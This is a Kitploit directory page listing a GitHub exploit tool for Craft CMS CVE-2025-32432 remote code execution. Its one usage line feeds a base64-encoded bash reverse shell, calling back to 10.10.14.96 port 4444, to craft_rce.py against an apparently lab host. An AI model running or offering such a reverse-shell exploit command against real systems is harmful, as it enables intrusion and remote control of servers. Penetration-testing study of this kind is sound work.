Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
craftcms-cve-2025-32432-rce — Craft CMS CVE-2025-32432 command runner adapted from Nicolas Bourras and Orange Cyberdefense research | Kitploit
Tools/GitHubGitHub/psyguy007-sys/craftcms-cve-2025-32432-rce
ExploitationWeb Application ExploitationPenetration Testing
GitHubpsyguy007-sys/craftcms-cve-2025-32432-rce

craftcms-cve-2025-32432-rce

Craft CMS CVE-2025-32432 command runner adapted from Nicolas Bourras and Orange Cyberdefense research

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
111 month agoNot yet reviewed
Share
root@kitploit:~
payload=$(printf %s "bash -c 'bash -i >& /dev/tcp/10.10.14.96/4444 0>&1'" | base64 -w0); ./craft_rce.py http://10.129.66.170 "echo $payload | base64 -d | bash" orion.htb
Download Tool